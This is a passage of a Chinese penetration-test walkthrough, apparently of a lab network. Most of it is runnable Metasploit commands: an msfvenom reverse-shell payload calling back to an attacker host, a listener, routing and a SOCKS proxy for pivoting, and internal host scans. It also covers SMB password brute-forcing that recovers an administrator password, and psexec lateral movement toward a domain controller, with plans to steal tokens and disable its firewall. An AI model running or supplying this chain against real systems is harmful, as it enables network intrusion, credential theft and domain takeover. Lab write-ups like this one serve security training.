#由于这台机器是Linux,生成elf大马 msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.43.33 LPORT=6666 SessionCommunicationTimeout=0 SessionExpirationTimeout=0 -f elf > shell.elf #开启监听 use exploit/multi/handler set payload linux/x64/meterpreter/reverse_tcp set lhost 192.168.43.33 set lport 6666 run #利用xftp上传大马到靶机 #赋予大马权限 chmod 777 shell.elf #运行 ./shell.elf
至此,拿下了外网这台机器
内网渗透
添加路由
1 2 3 4 5 6 7
#查看路由 run get_local_subnets #添加路由 run autoroute -s 192.168.93.0/24 run autoroute -p #挂起 background
添加代理
1 2 3 4 5 6 7 8
use auxiliary/server/socks_proxy set VERSION 4a set SRVHOST 0.0.0.0 set SRVPORT 1888 run
vim /etc/proxychain4.conf socks4 0.0.0.0 1888
内网主机扫描
1 2 3 4 5 6 7 8 9
#扫描内网主机存活: use auxiliary/scanner/discovery/udp_probe set rhosts 192.168.93.0-255 set threads 10 run #扫到了三台机器 192.168.93.30/24 win7 192.168.93.20/24 win2008 192.168.93.10/24 win-8GA56TNV3MV
#字典需要足够大 use auxiliary/scanner/smb/smb_login set SMBuser Administrator set PASS_FILE /home/kali/Desktop/top999.txt run -->192.168.93.20 smb 123qwe!ASD -->192.168.93.30 smb 123qwe!ASD #已经拿到了两台win的密码, #10这台机器出不了,可能就是域控
四,横向渗透
psexec攻击
1 2 3 4 5 6 7 8
#利用psexec工具进行攻击192.168.93.30/20主机 use exploit/windows/smb/psexec set payload windows/x64/meterpreter/bind_tcp set SMBUser administrator set SMBPass 123qwe!ASD set RHOSTS 192.168.93.30 run --->20/30机器攻击成功
use exploit/windows/smb/psexec set payload windows/x64/meterpreter/bind_tcp set SMBUser administrator set SMBPass zxcASDqw123!! set RHOSTS 192.168.93.10 run #攻击失败,可能是防火墙的原因 #换个姿势继续 #其它两台主机已经拿下,在win2k8上窃取管理员用户的token令牌 #这样就可以通过win2008 访问域控,然后远程关掉域控的防火墙,psexec攻击继续